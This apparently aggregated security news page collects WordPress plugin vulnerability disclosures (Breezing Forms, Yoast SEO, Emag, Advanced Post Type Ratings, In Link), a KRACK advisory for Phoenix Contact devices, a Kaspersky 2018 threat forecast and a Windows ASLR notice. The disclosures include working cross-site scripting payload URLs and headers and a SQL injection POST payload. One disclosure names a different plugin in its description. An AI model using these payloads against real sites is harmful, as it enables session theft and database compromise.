WordPress Breezing Forms 1.2.7.42 Cross Site Scripting

Class Input Validation Error
Remote Yes

Credit Ricardo Sanchez
Vulnerable Breezing Forms Plugin 1.2.7.42

Breezing Forms Plugin is prone to a stored cross-site scripting
vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the
browser of an unsuspecting user in the context of the affected site. This
may allow the attacker to steal cookie-based authentication credentials and
to launch other attacks.

To exploit this issue following steps:
The XSS reflected because the values are not filter correctly:

Demo Request POST:

POST
//wordpress/wp-content/plugins/breezing-forms/platform/administrator/components/com_breezingforms/admin/download.php
HTTP/1.1
Host: localhost
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: <script>alert(“XSS”)</script>
Accept-Encoding: gzip, deflate, br
Accept-Language: es-ES,es;q=0.9
Cookie:
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

filename=none&HTTP_REFERER=1

WordPress Yoast SEO Cross Site Scripting

Discoverer: Elias Dimopoulos
Linkedin: https://gr.linkedin.com/in/dimopouloselias

Vulnerability: Reflected XSS
Affected plugin: Yoast SEO plugin < 5.8.0
Active installations: 5+ million
URL: https://wordpress.org/plugins/wordpress-seo/#developers

Assigned CVE: CVE-2017-16842

———————————————————–
Thanks Yoast for their immediate response.
———————————————————–

The vulnerability lies in the “tab” parameter and can cause reflected
XSS vulnerability.

The vulnerability can be exploited against an administrator by using the
following url:

http://victim/wp-admin/admin.php?page=wpseo_search_console&tab=settings’><script>alert(window.location)</script><!–

The victim has to have a valid profile under
http://victim/wp-admin/admin.php?page=wpseo_search_console&tab=settings
(example: profile.png)
If there is the message “No profiles found” under the above link, the
plugin has not finished with the configuration and the vulnerability
cannot be exploited.

A logged in Administrator, who will click on the above link, he will
receive an alert box with the value of “window.location”.

In this case, the javascript code is just an alert box, however any kind
of malicious javascript code can be used.

Reproduce:

1. Login to your wordpress as an admin.
2. Ensure that a valid profile has been configured under
http://victim/wp-admin/admin.php?page=wpseo_search_console&tab=settings
(example: profile.png)
3. Access the following link:

http://victim/wp-admin/admin.php?page=wpseo_search_console&tab=settings’><script>alert(window.location)</script><!–

4. The alert box should be executed.

The vulnerability has been tested against:

* Yoast SEO Version: 5.7.1
* WordPress 4.8.3 running Twenty Seventeen theme.
* Firefox 56.0 (64-bit) – Mozilla Firefox for Ubuntu canonical – 1.0

I also tried to track down the issue in the source code:

file: admin/google_search_console/class-gsc-platform-tabs.php:

70 private function set_current_tab( array $platforms ) {
71 $this->current_tab = key( $platforms );
72 if ( $current_platform = filter_input( INPUT_GET,
‘tab’ ) ) {
73 $this->current_tab = $current_platform;
74 }
75 }

file: wordpress-seo/admin/google_search_console/class-gsc-table.php:

361 echo “<input id=’field_platform’ type=’hidden’ name=’platform’
value='{$platform}’ />”;

the filter_input function has the following definition:

mixed filter_input ( int $type , string $variable_name [, int $filter =
FILTER_DEFAULT [, mixed $options ]] )

If filter is omitted like in the code above, FILTER_DEFAULT will be
used, which is equivalent to FILTER_UNSAFE_RAW. This will result in no
filtering taking place by default. (ref:
http://php.net/manual/en/function.filter-input.php)

WordPress Emag Marketplace Connector 1.0 Cross Site Scripting

Class Input Validation Error
Remote Yes

Credit Ricardo Sanchez
Vulnerable Emag Marketplace Connector 1.0

Emag Marketplace Connector Plugin is prone to a stored cross-site scripting
vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the
browser of an unsuspecting user in the context of the affected site. This
may allow the attacker to steal cookie-based authentication credentials and
to launch other attacks.

To exploit this issue following steps:
The XSS reflected because the values are not filter correctly:

Demo Request:

http://localhost/wordpress/wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php?post=
“/><script>alert(“XSS”)</script>

WordPress Advanced Post Type Ratings 1.1 Cross Site Scripting

Class Input Validation Error
Remote Yes

Credit Ricardo Sanchez
Vulnerable Advanced Post Type Ratings Plugin 1.1

DFD Reddcoin Tips Plugin is prone to a stored cross-site scripting
vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the
browser of an unsuspecting user in the context of the affected site. This
may allow the attacker to steal cookie-based authentication credentials and
to launch other attacks.

To exploit this issue following steps:
The XSS reflected because the values are not filter correctly:

Demo Request:
http://localhost/wordpress/wp-content/plugins/advanced-post-type-ratings/inc/ReduxFramework/ReduxCore/inc/p.php?url=http://xss.rocks/scriptlet.html

PHOENIX CONTACT WLAN Capable Devices using the WPA2 Protocol

CVSS v3 6.8

ATTENTION: Public exploits are available.

Vendor: PHOENIX CONTACT

Equipment: WLAN capable devices using the WPA2 Protocol

Vulnerabilities: Reusing a Nonce

AFFECTED PRODUCTS

PHOENIX CONTACT reports that these vulnerabilities affect all versions of the following WLAN capable devices using the WPA2 Protocol:

  • BL2 BPC,
  • BL2 PPC,
  • FL COMSERVER WLAN 232/422/485,
  • FL WLAN 110x,
  • FL WLAN 210x,
  • FL WLAN 510x,
  • FL WLAN 230 AP 802-11,
  • FL WLAN 24 AP 802-11,
  • FL WLAN 24 DAP 802-11,
  • FL WLAN 24 EC 802-11,
  • FL WLAN EPA,
  • FL WLAN SPA,
  • ITC 8113,
  • RAD-80211-XD,
  • RAD-WHG/WLAN-XD,
  • TPC 6013,
  • VMT 30xx,
  • VMT 50xx, and
  • VMT 70xx.

IMPACT

Successful exploitation of these vulnerabilities could allow an attacker to operate as a “man-in-the-middle” between the device and the wireless access point.

MITIGATION

PHOENIX CONTACT has reported that users operating embedded devices in AP mode are not affected by these vulnerabilities. PHOENIX CONTACT is actively working on discovering how these vulnerabilities affect its products and plans to release future updates as they become available. For more information, please see the advisory at this location:

https://cert.vde.com/de-de/advisories/vde-2017-003

PHOENIX CONTACT recommends that users apply the security update provided by Microsoft at the following location for devices running Microsoft Windows:

https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-13080

If WPA-TKIP is being used for WLAN configuration, PHOENIX CONTACT recommends the user switch to AES-CCMP immediately.

NCCIC/ICS-CERT recommends that users take defensive measures to minimize the risk of exploitation of these vulnerabilities. Specifically, users should:

  • Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.
  • Locate control system networks and remote devices behind firewalls, and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

ICS-CERT reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.

ICS-CERT also provides a section for control systems security recommended practices on the ICS-CERT web page. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.

Additional mitigation guidance and recommended practices are publicly available in the ICS‑CERT Technical Information Paper, ICS-TIP-12-146-01B–Targeted Cyber Intrusion Detection and Mitigation Strategies, that is available for download from the ICS-CERT web site.

Organizations observing any suspected malicious activity should follow their established internal procedures and report their findings to ICS-CERT for tracking and correlation against other incidents.

These vulnerabilities are not remotely exploitable. High skill level is needed to exploit.

VULNERABILITY OVERVIEW

Multiple products are affected by key reinstallation attacks known as KRACK. The four-way hand shake traffic in the Wi-Fi Protected Access WPA and WPA2 protocol can be manipulated to allow nonce reuse resulting in key reinstallation. This could allow an attacker to execute a “man-in-the-middle” attack, enabling the attacker within radio range to replay, decrypt, or spoof frames.

The following CVEs have been assigned to this group of vulnerabilities:

CVE-2017-13077: reinstallation of the pairwise key in the four-way handshake,

CVE-2017-13078: reinstallation of the group key in the four-way handshake, and

CVE-2017-13080: reinstallation of the group key in the group key handshake,

A CVSS v3 base score of 6.8 has been assigned; the CVSS vector string is (AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N).

RESEARCHER

Mathy Vanhoef of imec-DistriNet, KU Leuven discovered these vulnerabilities. PHOENIX CONTACT reported these vulnerabilities to [email protected] [email protected] coordinated these vulnerabilities with ICS-CERT.

BACKGROUND

Critical Infrastructure Sectors: Communications, Critical Manufacturing, Information Technology

Countries/Areas Deployed: Worldwide

Company Headquarters Location: Germany

WordPress In Link 1.0 SQL Injection

Vulnerability Type:

SQL injection is POST parameter “keyword”

Affected plugin:
—————————————
In Link
Version: 1.0
Requires WordPress Version: 2.8 or higher
Compatible up to: 2.8
URL: https://wordpress.org/plugins/inlinks/
(plugin has been closed after the report)
—————————————

Affected file inlinks/inlinks.php

Affected lines:

58 $Keyword = trim($_POST[‘keyword’]);
59 $URL = trim($_POST[‘url’]);
60 $Rel = trim($_POST[‘rel’]);
61 $Target = trim($_POST[‘target’]);
62 $table_name = $wpdb->prefix .”URLKeywordsMapping”;
63 $SelectKeywordURLMappingDetails = “select * from $table_name
where FldKeyword LIKE ‘”.$Keyword.”‘” ;
64
65 $KeywordURLMappingDetails =
$wpdb->get_results($SelectKeywordURLMappingDetails);
66
67 if(count($KeywordURLMappingDetails))
68 {
69 $Message = “<div align=’center’ style=\”color:red;
font-weight:bold;\”>The keyword <i>”.$Keyword.”</i> already exists in
the table.</div>”;
70 }

More issues seems to exist in the plugin, because of lack of input
validation and the lack of use of prepared statements.

Affected URL:

/wp-admin/options-general.php?page=inlinks%2Finlinks.php

POST Parameters (with payload):
keyword=gweeperx’or+2=2–+-&url=http%3A%2F%2F127.0.0.4&rel=nofollow&target=_blank&ActionType=AddKeywordURL&Add=Add

Tested against:

* In Link 1.0
* WordPress 4.9
* mysql Ver 14.14 Distrib 5.7.20, for Linux (x86_64) using EditLine
wrapper
* PHP 7.0.22-0ubuntu0.16.04.1

Threat Predictions for Connected Life in 2018

 Download the Kaspersky Security Bulletin: Threat Predictions for Connected Life in 2018

Introduction: To be awake is to be online

The average home now has around three connected computers and four smart mobile devices. Hardly surprising, considering that 86 per cent of us check the Internet several times a day or more, and that’s outside of work. Chatting, shopping, banking, playing games, listening to music, booking travel and managing our increasingly connected homes. The risk of cyberattack can be the furthest thing from our mind.

Every year, Kaspersky Lab’s experts look at the main cyberthreats facing connected businesses over the coming 12 months, based on the trends seen during the year. For 2018, we decided to extract some top predictions that also have big implications for everyday connected life.

So what could the hackers be after in 2018?

  • Security gaps in your connected car. Earlier this year, researchers showed how a hack could shut down all safety features in a car, including airbags. Such attacks will become easier as connected cars contain more and more components that could be accessed digitally. For example: mobile phones can be paired with a vehicle’s head unit via Bluetooth; and Bluetooth was recently found to have more than 8 serious software A hacker only has to use one and they will have an access to car systems to conduct further attacks. Some cars have cellular or Wi-Fi connectivity and almost any modern car has a USB-port – all of these can be used in order to deliver infected code to the car’s systems.

    The data exchange between the internal systems of a car has been proven to be vulnerable to external interference, both by external researchers and Kaspersky Lab own findings. Given the fact that car industry is planning the development and production cycles years ahead, it is unlikely that all reported issues will be fixed in new connected cars coming on the market in 2018. Most of these cars were designed before cybersecurity became an issue for the automotive industry. That said, we expect that cars coming off the production line after that will have the most critical cybersecurity features implemented and will therefore be safer.

  • Vulnerable car apps. Most leading car manufacturers now offer apps to make life easier for drivers – they can locate, lock/unlock your car, check tire pressure, request assistance, schedule maintenance and more. Researchers have already shown how many such apps can be hacked to partly take over a car. 2018 could see the first appearance of an infected app that can manage a car or spy on its owner by tracking their location, or collecting authentication data. This data could then be sold on the underground market. Kaspersky Lab researchers have seen signs that authentication data to access connected car apps is already in demand on underground markets. As the number of connected cars increases, this trend will become a bigger problem.
  • Security gaps in wearable medical devices/implants, for data theft or sabotage. In 2018, there will be an estimated 19 million connected medical wearables, such as insulin pumps, pacemakers, monitors etc. in use, up from 12.8 million today. Companies are already issuing warnings about security gaps, knowing that, in an extreme case hackers could tamper with devices, set them to administer a fatal dose or to otherwise malfunction. This threat will rise in 2018 and probably keep on rising.
  • Still everywhere. The global pandemic that is ransomware shows no signs of abating. Our data shows that just under a million of our users were attacked with ransomware in 2017, only slightly less than in 2016 – but the actual number of those attacked in 2017 will be much higher. For example, the WannaCry ransomware victim count may exceed 700,000 thousand. With malware and distribution tools freely available on the web, attackers have discovered that locking or encrypting people’s data and devices – and those belonging to big companies, hospitals and smart city networks – is an easy and effective way of making money. In 2018 expect more of the same.
  • Malware, ditto – particularly that targeting Android mobile devices. We live in an increasingly mobile-driven world and hackers have upped their game. In 2017, we saw Android malware poisoning hotel booking, taxi service and ride-sharing apps, targeting mobile payments (SMS- and WAP billing), and using new techniques to bypass OS security. In 2018 we expect to see even more innovation.
  • Getting you to mine for cryptocurrency coins or stealing your coins. Cryptocurrencies are becoming more popular, so experts predict hackers will tap into people wanting to get a share of the action. In 2018, this could see more people going over to mining cryptocurrencies on their work-computers. We’ll certainly see more attacks designed to steal crypto coins from users, or install hidden mining tools on machines, particularly mobiles. Kaspersky Lab research shows that the number of people hit by such attacks have already exceeded two million in 2017. On the other hand, if handled properly and with the user’s consent, some forms of cryptocurrency mining may become a legal way of monetization for websites and/or apps.
  • Taking control of your connected stuff to create big botnets. Your home routers, connected webcams and smart thermostats are all great, but they’re likely full of software bugs and if you don’t set a proper password, hackers can pull them into a huge zombie botnet.  The infamous ‘Mirai’ botnet that nearly broke the Internet in 2016 was largely made up of CCTV cameras and connected printers – and in 2017 researchers found attackers improving Mirai’s tools. Proven as reliable and effective denial-of-service tools, new botnets built out of insecure devices may emerge in 2018.

  • Taking control of the world’s connected stuff for large scale disruption. Speaking of smart city technology such as CCTV cameras, what would happen if there was an attack on a city’s light control systems, causing not just blackouts but stroboscopic effects? Over the next year, smart city technologies such as traffic control, lighting, speed cameras, public transport and power supplies, as well as air traffic control infrastructure and more, will be a growing target for hackers. It’s estimated that by 2020 there will be 9.6 billion connected things used in smart cities around the world. Many of them just as buggy and vulnerable as your home router. Disruption to and disabling of these vast connected systems could do untold damage.

Conclusion: Stay awake when online

So there’s some scary stuff and a few not very nice people out there.  That shouldn’t stop you from making the most of what connected devices and systems have to offer over the next year and beyond. Fortunately, there are a lot of simple things that you can to stay safe.  Here’s a few examples:

  • Make use of the security features that come with your devices: set a decent password and keep the software updated. Not just phones and computers, but everything that is connected.
  • Be selective when choosing a smart device. Ask yourself: Does this really need an internet connection? If the answer is yes, then take the time to understand the device options before buying. If you discover that it has hard-coded passwords, choose a different model.
  • Consider cryptocurrencies as another way of saving and treat them accordingly. Just like you treat your ‘regular’ money.
  • Only install apps from reputable stores like Google Play, created by reputable developers.
  • Last but not least, consider supplementing the OS/device security with some additional software – particularly to keep your family and finances safe. A free version of Kaspersky Lab’s security software is available here.

For more information and advice on staying safe online please see the Kaspersky Daily blog.

Windows ASLR Vulnerability

Original release date: November 20, 2017

The CERT Coordination Center (CERT/CC) has released information on a vulnerability in Windows Address Space Layout Randomization (ASLR) that affects Windows 8, Windows 8.1, and Windows 10. A remote attacker could exploit this vulnerability to take control of an affected system.

US-CERT encourages users and administrators to review CERT/CC VU #817544 and apply the necessary workaround until a patch is released.


This product is provided subject to this Notification and this Privacy & Use policy.